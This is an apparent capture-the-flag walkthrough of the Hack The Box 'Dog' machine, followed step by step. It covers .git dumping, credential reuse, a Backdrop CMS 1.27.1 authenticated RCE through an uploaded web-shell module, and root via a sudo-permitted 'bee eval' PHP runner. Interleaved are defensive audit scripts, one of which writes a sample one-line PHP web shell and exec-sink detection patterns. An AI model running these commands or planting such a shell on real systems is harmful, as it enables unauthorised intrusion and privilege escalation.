HTB | Dog
machine - https://app.hackthebox.com/machines/Dog
IP - 10.10.11.58
NMAP
└─$ nmap -sT -p- --min-rate 1000 10.10.11.58 -Pn -oA nmap_ports                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 13:21 IST
Nmap scan report for 10.10.11.58
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 87.84 seconds

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 13:23 IST
Nmap scan report for 10.10.11.58
Host is up (0.24s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
Port 80
From the nmap output we can see that /.git/ is exposed on the web server, so we can use git-dumper to dump the repository:
┌──(anurag㉿anurag)-[~/htb/dog/git]
└─$ git-dumper http://10.10.11.58/ .
Let's visit the website.

We also have a login portal.

Foothold/shell
Found MySQL credentials in settings.php (from the dumped repository).
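The exposed .git directory and the database credentials inside settings.php are the two findings a defender would want to catch before anyone else does. The script below is an added example written for this writeup (it is not part of the original post, of git-dumper, or of Backdrop): it walks a web root, reports any .git directory under it, and flags PHP files whose Backdrop-style `$database = 'mysql://user:pass@host/db'` DSN carries a password, printing the DSN with the password masked. The web root it builds in demo() is constructed, and the user, password and database names in it are made up.

```python
"""Audit a web root for an exposed .git directory and for database DSNs that embed
a password (Backdrop/Drupal-style settings.php). Added example for this writeup;
the sample web root built in demo() is constructed."""
import os
import re
import tempfile
from urllib.parse import urlsplit

# Backdrop stores its DB connection as a URL-style DSN in settings.php:
#   $database = 'mysql://user:pass@localhost/dbname';
DSN_RE = re.compile(r"""(?P<dsn>(?:mysql|mysqli|pgsql|sqlite)://[^'"\s]+)""")


def find_dsn_secrets(text):
    """Return (scheme, user, host, db) for every DSN in `text` that carries a password."""
    hits = []
    for m in DSN_RE.finditer(text):
        parts = urlsplit(m.group("dsn"))
        if parts.password:  # a DSN without a password is not a leaked secret
            hits.append((parts.scheme, parts.username, parts.hostname, parts.path.lstrip("/")))
    return hits


def scan_webroot(root):
    """Walk `root`; return (kind, path, detail) findings without printing the secret."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if ".git" in dirnames:
            # A .git directory under the document root is served to anyone who asks
            # for /.git/HEAD, which is what nmap's http-git script detected above.
            findings.append(("git-dir", os.path.join(dirpath, ".git"), None))
            dirnames.remove(".git")  # no need to descend into the object store
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for scheme, user, host, db in find_dsn_secrets(fh.read()):
                    masked = f"{scheme}://{user}:***@{host}/{db}"
                    findings.append(("dsn-password", path, masked))
    return findings


def demo():
    """Build a constructed web root (made-up names and password) and scan it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, ".git"))
    with open(os.path.join(root, "settings.php"), "w") as fh:
        fh.write("<?php\n$database = 'mysql://cms_user:Example-Pass-1@localhost/cms';\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php\necho 'hello';\n")
    return scan_webroot(root)


if __name__ == "__main__":
    for kind, path, detail in demo():
        print(kind, path, detail or "")
```

Run scan_webroot() against the document root of a deployment before it goes live. The git-dir finding is fixed by deploying from an export rather than a checkout, or by denying the directory in Apache 2.4 with `<DirectoryMatch "/\.git">Require all denied</DirectoryMatch>`; the dsn-password finding is fixed by keeping settings.php out of version control and rotating the database password once it has been committed anywhere.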

When we try to log in to the CMS login page with the credentials we found, we get an error for the username.

Enumerating Backdrop CMS
To find a valid username I will be using this repo (BackDropScan).
We found the Backdrop CMS version:
┌──(anurag㉿anurag)-[~/htb/dog/BackDropScan]
└─$ python BackDropScan.py --url http://10.10.11.58/ --version
[+] Version: 1.27.1
We found the valid username tiffany:
└─$ python BackDropScan.py --url http://10.10.11.58/ --userslist /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --userenum
[+] Valid username: john
[+] Valid username: tiffany
With the credentials we got from settings.php we can log in.

Backdrop CMS exploit via shell.tar.gz upload
We found the exploit via searchsploit:
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ searchsploit backdrop 1.27.1 
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)                                                                                                                                        | php/webapps/52021.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                                            
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ searchsploit -m php/webapps/52021.py
  Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52021
     Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
    Codes: N/A
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/anurag/htb/dog/52021.py
Let's run the script:
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
Find the place to upload the module. It differs from the location given by the PoC, and it only accepts files in tar, tgz, gz or bz2 format, so just repackage the module:
┌──(anurag㉿anurag)-[~/htb/dog]
└─$ tar -cvzf shell.tar.gz  shell 
shell/
shell/shell.info
shell/shell.php

We were able to execute commands:
http://10.10.11.58/modules/shell/shell.php?cmd=id
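The manual module installer is the intended path for this RCE: any account that can install modules can put PHP on the server, so from the defender's side the modules directory is what to watch. The Python audit below is an added example written for this writeup (not from the original post or from the exploit script): it compares a Backdrop `modules/` directory against the set of modules that are supposed to be there and flags PHP files in which a request parameter reaches a command-execution function on the same line. The module tree it builds in demo() is constructed; `mymod` is a made-up legitimate module and `shell` mirrors the module name used in the writeup.

```python
"""Audit a Backdrop `modules/` directory for modules that are not on the expected list
and for PHP files in which request input reaches a command-execution function.
Added example for this writeup; the sample module tree in demo() is constructed."""
import os
import re
import tempfile

# PHP sinks that run code or commands with a value taken (directly or through a
# wrapper call) from a request superglobal on the same line, e.g. system($_GET['cmd']).
EXEC_SINK_RE = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\([^)]*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)

# Backdrop module code lives in .module and .inc files as well as plain .php files.
PHP_EXTENSIONS = (".php", ".module", ".inc")


def audit_modules(modules_dir, expected):
    """Return (kind, detail) findings for `modules_dir` given the set of expected module names."""
    findings = []
    for name in sorted(os.listdir(modules_dir)):
        mod = os.path.join(modules_dir, name)
        if not os.path.isdir(mod):
            continue
        if name not in expected:
            # A module nobody deployed on purpose; the writeup's shell/ is one such.
            findings.append(("unexpected-module", name))
        for dirpath, _, files in os.walk(mod):
            for fname in files:
                if not fname.endswith(PHP_EXTENSIONS):
                    continue
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if EXEC_SINK_RE.search(line):
                            rel = os.path.relpath(path, modules_dir)
                            findings.append(("request-to-exec", f"{rel}:{lineno}"))
    return findings


def demo():
    """Build a constructed modules tree: one legitimate module, one dropped-in shell module."""
    modules = tempfile.mkdtemp(prefix="modules-")
    os.makedirs(os.path.join(modules, "mymod"))
    with open(os.path.join(modules, "mymod", "mymod.info"), "w") as fh:
        fh.write("name = My module\ntype = module\nbackdrop = 1.x\n")
    with open(os.path.join(modules, "mymod", "mymod.module"), "w") as fh:
        fh.write("<?php\nfunction mymod_menu() { return array(); }\n")
    os.makedirs(os.path.join(modules, "shell"))
    with open(os.path.join(modules, "shell", "shell.info"), "w") as fh:
        fh.write("name = shell\ntype = module\nbackdrop = 1.x\n")
    with open(os.path.join(modules, "shell", "shell.php"), "w") as fh:
        fh.write("<?php\nsystem($_GET['cmd']);\n")
    return audit_modules(modules, expected={"mymod"})


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind}: {detail}")
```

Build the expected set from a trusted deployment manifest rather than from the live server, and run the audit on a schedule or from file-integrity monitoring. The single-line pattern is deliberately simple and will miss input that is stored in a variable first; it catches the drop-in shell shown above, which is the common case. The underlying control is to limit who holds the permission to install modules, since that permission is equivalent to code execution on the web server.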
We can see there are two users. Let's reuse the password and see whether we can SSH in.

And we are in as johncusack.

Found user.txt:
johncusack@dog:~$ ls
user.txt

Priv Esc
johncusack has sudo rights to run /usr/local/bin/bee as (ALL : ALL):
johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ 
Looking at the help text of /usr/local/bin/bee, we see a command that executes arbitrary PHP:
  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
We can use this eval to get a root shell:
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash")'
[sudo] password for johncusack: 
root@dog:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@dog:/var/www/html# 
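The sudo rule is the actual weakness here: bee is a PHP runner, so a sudo grant on it is a grant of root code execution whatever the administrator intended. As an added example (not from the original writeup), the Python audit below parses `sudo -l` output in the format shown above and flags rules whose command is `ALL` or whose binary is known to execute caller-controlled code; the list of such binaries is a small assumption made for the example, and the sample output is a constructed copy of the one above.

```python
"""Flag sudo rules that amount to arbitrary code execution as root.
Added example for this writeup; the sample `sudo -l` output is constructed."""
import os
import re

# Binaries that execute caller-controlled code when run as root. Small illustrative
# list (an assumption for this example); extend it from your own inventory.
CODE_EXEC_BINARIES = {
    "bee": "Backdrop CLI: its 'eval' command runs arbitrary PHP after bootstrapping the site",
    "php": "PHP interpreter",
    "python3": "Python interpreter",
    "perl": "Perl interpreter",
    "bash": "shell",
    "sh": "shell",
}

# One rule line as printed by `sudo -l`: "(runas) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output):
    """Return (runas, tags, command) tuples from the rules section of `sudo -l` output."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):  # one runas spec may list several commands
            rules.append((m.group("runas").strip(), m.group("tags").strip(), cmd.strip()))
    return rules


def risky_rules(rules):
    """Return (command, reason) for rules that hand the caller code execution."""
    findings = []
    for _runas, _tags, cmd in rules:
        if cmd == "ALL":
            findings.append((cmd, "unrestricted sudo"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in CODE_EXEC_BINARIES:
            findings.append((cmd, CODE_EXEC_BINARIES[binary]))
    return findings


# Constructed copy of the `sudo -l` output shown in the writeup.
SAMPLE_SUDO_L = """\
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
"""

if __name__ == "__main__":
    for cmd, why in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"RISKY: {cmd} -> {why}")
```

Limiting the rule to specific bee arguments does not fix this, because the program itself decides what PHP to run; the fix is to not grant root on a PHP runner at all, or to wrap the one maintenance task that needs root in a script that takes no arguments and grant sudo on that script instead.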
And we have root.txt:
root@dog:/# cd /root
root@dog:~# ls
root.txt